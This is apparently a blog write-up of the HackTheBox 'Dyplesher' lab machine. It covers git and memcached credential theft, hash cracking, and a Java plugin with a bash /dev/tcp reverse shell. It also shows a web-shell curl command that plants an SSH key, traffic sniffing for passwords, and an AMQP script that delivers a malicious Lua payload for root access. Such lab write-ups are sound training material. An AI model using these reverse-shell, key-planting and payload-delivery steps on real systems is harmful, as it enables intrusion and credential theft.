HackTheBox Dyplesher Writeup – 10.10.10.190

Hello and welcome to my HackTheBox Dyplesher (10.10.10.190) writeup, an insane-difficulty Linux machine by felamos & yuntao.

The Dyplesher box starts with full enumeration. The machine was so unstable that I was not able to run nmap properly. Running the fuzzer gives a hint that Git is involved; however, cloning and downloading the Git repository is only the beginning. Once the Git repository is downloaded, I come to know that memcached is involved as well.

After getting the credentials using the memcached-cli tool another door opens, and another set of Git downloads needs to be done. Full enumeration here is a must. Then comes the time-consuming plug-in development; if you are good at Java, unlike me, it may be easy for you. So let us start.

Name: Dyplesher

Makers: felamos & yuntao

Difficulty: Insane

Points: 50

IP: 10.10.10.190

Enumeration

Like every other machine, I add the machine IP to the hosts file with the machine name and start the intense nmap scan. The nmap results show a few higher ports and the common lower ports open.

# root @ ns09 in ~/htb/dyplesher [16:49:06] 
$ nmap  -p 1-16000 dyplesher.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-27 16:49 +03
Nmap scan report for dyplesher.htb (10.10.10.190)
Host is up (0.14s latency).
Not shown: 15994 filtered ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
3000/tcp  open  ppp
4369/tcp  open  epmd
5672/tcp  open  amqp
11211/tcp open  memcache

Nmap done: 1 IP address (1 host up) scanned in 186.15 seconds

The Web Service

As the HTTP port 80 is open, I opened the hosted page; it runs a Minecraft server named “Worst Minecraft Server”. I also noticed another host name, test.dyplesher.htb, so I added the new host to /etc/hosts.

test.dyplesher.htb

Running WFUZZ

Both web apps didn’t reveal anything immediately, so I decided to enumerate further using WFUZZ on both hosts. While the fuzzing was going on, I noticed the “.git” directory disclosed by WFUZZ on test.dyplesher.htb.

wfuzz -u http://test.dyplesher.htb/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt --hc 404,302 
-----
wfuzz -u http://dyplesher.htb/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt --hc 404,302
Target: http://dyplesher.htb/FUZZ
Total requests: 16243

===================================================================
ID           Response   Lines    Word     Chars       Payload                                   
===================================================================

000000001:   200        123 L    241 W    4252 Ch     "index.php"                               
000000102:   200        0 L      0 W      0 Ch        "favicon.ico"                             
000000149:   403        9 L      28 W     278 Ch      ".htaccess"                               
000000237:   200        2 L      3 W      24 Ch       "robots.txt"                              
000000517:   403        9 L      28 W     278 Ch      ".html"                                   
000000776:   403        9 L      28 W     278 Ch      ".php"                                    
000001499:   403        9 L      28 W     278 Ch      ".htpasswd"                               
000001748:   403        9 L      28 W     278 Ch      ".htm"                                    
000002003:   403        9 L      28 W     278 Ch      ".htpasswds"                              
000004397:   403        9 L      28 W     278 Ch      ".htgroup"                                
000004914:   403        9 L      28 W     278 Ch      "wp-forum.phps"                           
000006724:   403        9 L      28 W     278 Ch      ".htaccess.bak"                           
000008245:   403        9 L      28 W     278 Ch      ".htuser"                                 
000010870:   403        9 L      28 W     278 Ch      ".ht"                                     
000010871:   403        9 L      28 W     278 Ch      ".htc"  

Cloning The Exposed Repository

I used GitDumper to clone the exposed Git repository and restored index.php and README.md.

# root @ ns09 in ~/htb/dyplesher/GitTools/Dumper on git:master x 
$ ./gitdumper.sh http://test.dyplesher.htb/.git/ test.dyplesher
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances. 
# Only for educational purposes!
###########


[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[+] Downloaded: config
[+] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[-] Downloaded: packed-refs
[+] Downloaded: refs/heads/master
[-] Downloaded: refs/remotes/origin/HEAD
[-] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[+] Downloaded: logs/refs/heads/master
[-] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[-] Downloaded: /refs/wip/index/refs/heads/master
[-] Downloaded: /refs/wip/wtree/refs/heads/master
[+] Downloaded: objects/b1/fe9eddcdf073dc45bb406d47cde1704f222388
[-] Downloaded: objects/00/00000000000000000000000000000000000000
[+] Downloaded: objects/3f/91e452f3cbfa322a3fbd516c5643a6ebffc433
[+] Downloaded: objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391
[+] Downloaded: objects/27/29b565f353181a03b2e2edb030a0e2b33d9af0

# root @ ns09 in ~/htb/dyplesher/GitTools/Dumper on git:master x 
$ cd test.dyplesher 

# root @ ns09 in ~/htb/dyplesher/GitTools/Dumper/test.dyplesher on git:master o 
$ git restore index.php                              

# root @ ns09 in ~/htb/dyplesher/GitTools/Dumper/test.dyplesher on git:master o 
$ git restore README.md                                        

# root @ ns09 in ~/htb/dyplesher/GitTools/Dumper/test.dyplesher on git:master o
$ 

From the restored index.php file I found the cached credentials of felamos.

Cached Credentials: felamos:zxcvbnm

As it was confirmed that memcached is in place, let us use the well-known memcached-cli tool (https://metacpan.org/pod/memcached-cli).

Reference: https://www.npmjs.com/package/memcached-cli

Download the Tool:

Collecting Entries Using Memcached-CLI

The next step is to collect the memcached entries, such as usernames and passwords, using the credentials we have and the tool we just downloaded. The memcached server normally runs on the higher port 11211.

# root @ ns09 in ~/htb/dyplesher
$ memcached-cli felamos:zxcvbnm@dyplesher.htb:11211
dyplesher.htb:11211> get username
MinatoTW
felamos
yuntao
dyplesher.htb:11211> get password
$2a$10$5SAkMNF9fPNam***************ePuI1DCJa
$2y$12$c3SrJLybUEOYm***************VrxiA3pQK
$2a$10$zXNCus.UXtiuJ***************itiwUoalS
dyplesher.htb:11211> 

Cracking The Hash

As we retrieved the passwords as salted hashes, we cannot use them directly, but there is Mr. John (John the Ripper) for our rescue.
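The two memcached queries above and the bcrypt strings they return, as an added example that is not part of the original writeup: a parser for memcached's text-protocol `get` reply, plus a check that reads the bcrypt variant and cost factor off each hash so you can tell how expensive a cracking run will be. The reply bytes and the hash bodies are constructed here (the box's real hashes are redacted on this page).

```python
import re

# memcached text protocol: "get k1 k2\r\n" is answered by one VALUE block per
# key that exists, then "END\r\n".  As usually deployed the text protocol has no
# authentication, so anything that can reach port 11211 can read these keys.

def get_command(*keys: str) -> bytes:
    """Build the request memcached-cli sends for 'get username', etc."""
    return b"get " + b" ".join(k.encode() for k in keys) + b"\r\n"

def parse_get_response(raw: bytes) -> dict:
    """Parse a 'get' reply into {key: value_bytes}, honouring each length field."""
    values, pos = {}, 0
    while True:
        eol = raw.index(b"\r\n", pos)
        line, pos = raw[pos:eol], eol + 2
        if line == b"END":
            return values
        if not line.startswith(b"VALUE "):
            raise ValueError(f"unexpected line: {line!r}")
        parts = line.split()                    # VALUE <key> <flags> <bytes> [<cas>]
        key, nbytes = parts[1].decode(), int(parts[3])
        values[key] = raw[pos:pos + nbytes]     # data block may itself contain newlines
        if raw[pos + nbytes:pos + nbytes + 2] != b"\r\n":
            raise ValueError(f"data block for {key} does not match its length field")
        pos += nbytes + 2

# bcrypt strings look like $2a$10$<22-char salt><31-char hash>; the two-digit field
# is the log2 cost, so the $2y$12$ hash above costs 4x per guess what $2a$10$ does.
BCRYPT_RE = re.compile(r"^\$(2[abxy]?)\$(\d{2})\$[./A-Za-z0-9]{53}$")

def bcrypt_info(hash_str: str):
    """Return variant, cost and iteration count of a bcrypt hash, or None if not bcrypt."""
    m = BCRYPT_RE.match(hash_str)
    if not m:
        return None
    cost = int(m.group(2))
    return {"variant": m.group(1), "cost": cost, "iterations": 2 ** cost}

def audit_cache(raw: bytes) -> dict:
    """Pair each cached username with the cost of the hash stored beside it."""
    values = parse_get_response(raw)
    names = values["username"].decode().split("\n")
    hashes = values["password"].decode().split("\n")
    return {n: bcrypt_info(h) for n, h in zip(names, hashes)}

# Constructed sample reply shaped like the two queries above; the hash bodies are
# filler characters, not the box's real hashes.
def value_block(key: str, data: bytes) -> bytes:
    return b"VALUE %s 0 %d\r\n%s\r\n" % (key.encode(), len(data), data)

USERS = b"MinatoTW\nfelamos\nyuntao"
HASHES = b"\n".join(p.encode() + b"A" * 53 for p in ("$2a$10$", "$2y$12$", "$2a$10$"))
SAMPLE_REPLY = value_block("username", USERS) + value_block("password", HASHES) + b"END\r\n"
```

Feed the bytes a real socket returns into `parse_get_response` and `audit_cache` to get the same per-user cost table for a live cache.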

I have the credentials but am not sure where to use them, so I decided to check the other open ports, thinking they probably have some services running.

Gogs At The Port 3000

So my wild guess was correct: there are other services running on the box as well; there is a Gogs installation running on port 3000.

I registered myself as nav1n and logged in, then I found the following users:

So finally I know where the credentials are to be used. I managed to access each account on Gogs using the cracked credentials.

felamos

We can see Felamos is hosting a copy of git and memcached in his repo; we can easily clone the repositories to the local machine as we have the credentials. And without wasting a moment I downloaded the repo.

Upon enumerating the downloaded files I didn’t see anything special, but I noticed that the memcached repository is the one I downloaded earlier. It took me a while to enumerate more on the Git, and I found the following releases.

I downloaded them all, but only the repositories directory contains a folder named @hashed, and this folder contains hashed git bundles.

# root @ ns09 in ~/htb/dyplesher/repositories/@hashed on git:master x 
$ ls -la
total 24
drwx------ 6 root root 4096 Sep  7  2019 .
drwx------ 3 root root 4096 Sep  7  2019 ..
drwx------ 3 root root 4096 Sep  7  2019 4b
drwx------ 3 root root 4096 May 24 06:06 4e
drwx------ 3 root root 4096 Sep  7  2019 6b
drwx------ 3 root root 4096 Sep  7  2019 d4

# root @ ns09 in ~/htb/dyplesher/repositories/@hashed on git:master x 
$ find . -type f
./4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle
./d4/73/d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle
./6b/86/6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle
./4b/22/4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle

# root @ ns09 in ~/htb/dyplesher/repositories/@hashed on git:master x 

Unpacking the Git Bundles

So what I did is, I moved all the .bundle files into a new directory I created, “Bundle-Unpack”.

# root @ ns09 in ~/htb/dyplesher/bundle-unpack
$ ls -la
total 21512
drwxr-xr-x 2 root root     4096 May 28 02:01 .
drwxr-xr-x 5 root root     4096 May 28 02:00 ..
-rw-r--r-- 1 root root    10837 Sep  7  2019 4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle
-rw-r--r-- 1 root root 21952510 May 24 06:17 4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle
-rw-r--r-- 1 root root    31545 Sep  7  2019 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle
-rw-r--r-- 1 root root    17569 Sep  7  2019 d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle

# root @ ns09 in ~/htb/dyplesher/bundle-unpack
$ 

Then, I used the git clone command to unpack them.

# root @ ns09 in ~/htb/dyplesher/bundle-unpack
$ git clone 4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle 
Cloning into '4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a'...
Receiving objects: 100% (39/39), 10.46 KiB | 1.31 MiB/s, done.
Resolving deltas: 100% (12/12), done.

# root @ ns09 in ~/htb/dyplesher/bundle-unpack 
$ git clone 4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle
Cloning into '4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce'...
Receiving objects: 100% (51/51), 20.94 MiB | 37.61 MiB/s, done.
Resolving deltas: 100% (5/5), done.

# root @ ns09 in ~/htb/dyplesher/bundle-unpack 
$ git clone 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle
Cloning into '6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b'...
Receiving objects: 100% (85/85), 30.69 KiB | 10.23 MiB/s, done.
Resolving deltas: 100% (40/40), done.

# root @ ns09 in ~/htb/dyplesher/bundle-unpack 
$ git clone d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle
Cloning into 'd4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35'...
Receiving objects: 100% (21/21), 16.98 KiB | 8.49 MiB/s, done.
Resolving deltas: 100% (9/9), done.
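Before cloning an unknown bundle it helps to know what it holds. Here is an added example (not from the writeup, and not Git's own code) that reads a bundle's header and the pack header behind it in Python, reporting its refs, any prerequisite commits that would make a standalone `git clone` fail, and the object count git prints while receiving. The two bundles are constructed inside the block; the SHAs are dummies.

```python
import struct
from dataclasses import dataclass, field

@dataclass
class BundleInfo:
    version: int
    capabilities: dict = field(default_factory=dict)   # v3 '@key=value' lines only
    prerequisites: list = field(default_factory=list)  # (sha, comment) receiver must already have
    refs: dict = field(default_factory=dict)           # refname -> sha
    pack_version: int = 0
    pack_objects: int = 0

def parse_bundle(data: bytes) -> BundleInfo:
    """Read a bundle's header and the 12-byte pack header that follows it.

    Layout (gitformat-bundle): '# v2 git bundle' signature, optional '@cap=value' lines (v3),
    '-<sha> <comment>' prerequisites, '<sha> <refname>' refs, a blank line, then a packfile
    that starts with 'PACK', a 4-byte version and a 4-byte object count (big-endian)."""
    if data.startswith(b"# v2 git bundle\n"):
        version = 2
    elif data.startswith(b"# v3 git bundle\n"):
        version = 3
    else:
        raise ValueError("not a git bundle: bad signature line")
    header_end = data.index(b"\n\n")
    info = BundleInfo(version=version)
    for raw in data[:header_end].split(b"\n")[1:]:
        line = raw.decode("utf-8")
        if line.startswith("@"):
            key, _, value = line[1:].partition("=")
            info.capabilities[key] = value
        elif line.startswith("-"):
            sha, _, comment = line[1:].partition(" ")
            info.prerequisites.append((sha, comment))
        else:
            sha, _, refname = line.partition(" ")
            info.refs[refname] = sha
    pack = data[header_end + 2:]
    if len(pack) < 12 or pack[:4] != b"PACK":
        raise ValueError("pack data missing or truncated")
    info.pack_version, info.pack_objects = struct.unpack(">II", pack[4:12])
    return info

def clone_blockers(info: BundleInfo) -> list:
    """Reasons a plain 'git clone <bundle>' into an empty directory would fail."""
    problems = [f"needs prerequisite commit {sha} ({why})" for sha, why in info.prerequisites]
    if not info.refs:
        problems.append("bundle lists no refs")
    return problems

# Constructed samples: a full-history bundle like the four above, and an incremental
# one that depends on a commit the receiver must already have.  SHAs are dummies.
SHA = "ab" * 20
FAKE_PACK = b"PACK" + struct.pack(">II", 2, 39) + b"\x00" * 8   # header only, body omitted
FULL_BUNDLE = f"# v2 git bundle\n{SHA} refs/heads/master\n{SHA} HEAD\n\n".encode() + FAKE_PACK
INCREMENTAL_BUNDLE = f"# v2 git bundle\n-{'cd' * 20} base commit\n{SHA} refs/heads/master\n\n".encode() + FAKE_PACK
```

Run `parse_bundle(open(path, "rb").read())` on a real .bundle to list its refs before you clone it.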

Once the unpacking was successfully done, I started enumerating, and this took almost 25 to 30 minutes of going through the folders and their contents until I found a directory, Login Security, which contained a SQLite database that eventually showed me there is a hashed credential.

I let John crack the password and talked to one of my friends over Discord about the usage of the new credentials I got. Before he replied, John finished his task and I had the clear-text password.

Logging In to Dashboard

As I was able to crack the password using JTR, I found the way to log in as well. I logged in to the dashboard using one of the email IDs found earlier.

The dashboard has statistics of users and options to upload, delete and reload plugins. Other than this I don’t see anything useful. I again hit a wall, so I decided to talk to friends on Discord. The answer was not favourable: I needed to create a plugin in Java with a reverse shell. Well, if you ask me what I hate most in coding, I tell you it's Java and Java development.

I finally found the easiest way (the laziest way) to make a workable plugin with a reverse shell, upload it through http://dyplesher.htb/home/add and then reload it to activate it.

I used the IntelliJ IDEA IDE to develop the plugin.

Developing The Plugin

pom.xml

    <groupId>htb.dyplesher</groupId>
    <artifactId>minecraft_plugin</artifactId>
    <version>TEST version 1</version>    

main.java

I used PentestMonkey’s reverse shell idea and worked on it to make my own reverse shell.

// Java form of PentestMonkey's Groovy one-liner (the Groovy syntax does not compile in a Java plugin);
// 10.0.0.1:2002 is the placeholder listener address from his example
Runtime r = Runtime.getRuntime();
Process p = r.exec(new String[]{"/bin/bash", "-c", "exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do $line 2>&5 >&5; done"});
p.waitFor();

Uploading the Plugin:

Activating The Plugin

Once the plugin was loaded and activated successfully, I opened my PHP reverse shell nav1n.php and, to make sure everything was working fine, I ran whoami and got MinatoTW as the user.

The next step is to generate a fresh SSH key and copy my SSH public key to MinatoTW’s .ssh directory.

# root @ ns09 in ~/htb/dyplesher [17:31:03] 
$ ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
/root/.ssh/id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
The key's randomart image is:
+---[RSA 3072]----+
|    . o o.       |
|     B = oo      |
|    + O o. .     |
|     + ooo.      |
|      +.S.o.     |
|o    . o  +o     |
| =oo.    *  .    |
|===+E   . +.     |
|@BO+     . ..    |
+----[SHA256]-----+

# root @ ns09 in ~/htb/dyplesher [17:31:50] 
$ curl -G 'http://test.dyplesher.htb/nav1n.php' --data-urlencode 'cmd=echo ssh-rsa AAAAB3NzaC1yc/---------snip------------/floNC8dQgsN8= root@ns09 > /home/MinatoTW/.ssh/authorized_keys'
# root @ ns09 in ~/htb/dyplesher [17:35:55]

Once uploaded, I made sure from the reverse shell that the key was copied.

Getting User

The next step is straightforward.

SSH

As I can see my SSH public key is copied, I immediately SSH into the box as minatotw and log in successfully.

As I can see the user MinatoTW is a member of the wireshark group, I’m not sure yet what to do with that; possibly he’s running a Wireshark service. Let’s find out. First I need to get the interface IDs:

Once I knew the interface, I captured the traffic using tshark.

Downloading the Capture:

I left the capture running for about 15 minutes so that I could have as much data as possible. Once done, I downloaded the capture to my local machine using scp.

Analyzing PCAP file

I started analyzing the PCAP file, as I knew I was going to fish out something huge. After analyzing for a few minutes, I found many users and their credentials, and it didn’t take much time for me to understand these were the credentials I was looking for.

Creds found:

  • Yuntao:wag******ob
  • Felamos:tie*******eg
  • MinatoTW:bi*******ov

As soon as I gathered the passwords of the users, I tried to switch to a new user and got logged in as Felamos. user.txt was found in Felamos’ home directory and I grabbed it immediately.

Privilege Escalation

After a couple of days of battle, I finally got the user. It was such a great feeling; I slept last night at 4 AM. I wasted half of the time just finding a way to use a JAR file to insert my reverse shell. It wouldn’t have been that easy if a fellow HTB’er hadn’t given me a nudge. His reply was so precise that I won half the battle in the HTB forum DM itself.

Processes:

So Lua is running on the machine, and after discussing with a couple of others on Discord we decided that the way to exploit it is a malicious Lua script/plugin. But the question is how?

Pika

Pika is a Python client library for the Advanced Message Queuing Protocol (AMQP), the protocol nmap reported on port 5672. AMQP is a two-way RPC protocol where the client can send requests to the server and the server can send requests to a client; Pika implements or extends IO loops in each of its asynchronous connection adapters.

The pika.credentials module provides the mechanism by which you pass the username and password to the ConnectionParameters class when it is created.

Example:

import pika
credentials = pika.PlainCredentials('username', 'password')
parameters = pika.ConnectionParameters(credentials=credentials)

Ref: https://pika.readthedocs.io/en/stable/intro.html and this: https://www.programcreek.com/python/example/9241/pika.ConnectionParameters

So based on the above references, we made a Python script that connects to the AMQP service on the box and publishes the URL of the malicious Lua plugin for the server to fetch.

import pika
credentials = pika.PlainCredentials('yuntao', 'E********p')
parameters = pika.ConnectionParameters('10.10.10.190', 5672, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
# the queue name is not shown on this page; replace the placeholder with the queue the server consumes
channel.basic_publish(exchange='', routing_key='QUEUE_NAME_PLACEHOLDER', body='http://127.0.0.1:9999/68523.lua')
connection.close()

I made a Lua plugin file named 68523.lua and copied my SSH public key into it. When the file is triggered it will write my SSH key into /root/.ssh/authorized_keys.

Then I run my python script lua.py from my local Kali machine.

At the same time I saw the request on the server was hit and my malicious plugin was activated. I immediately SSH’d into the box as root, but it didn’t work; I had to try a couple of times before I finally got root.

Thanks for reading. It was a great box, worth 50 points; the user was much harder than root.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n
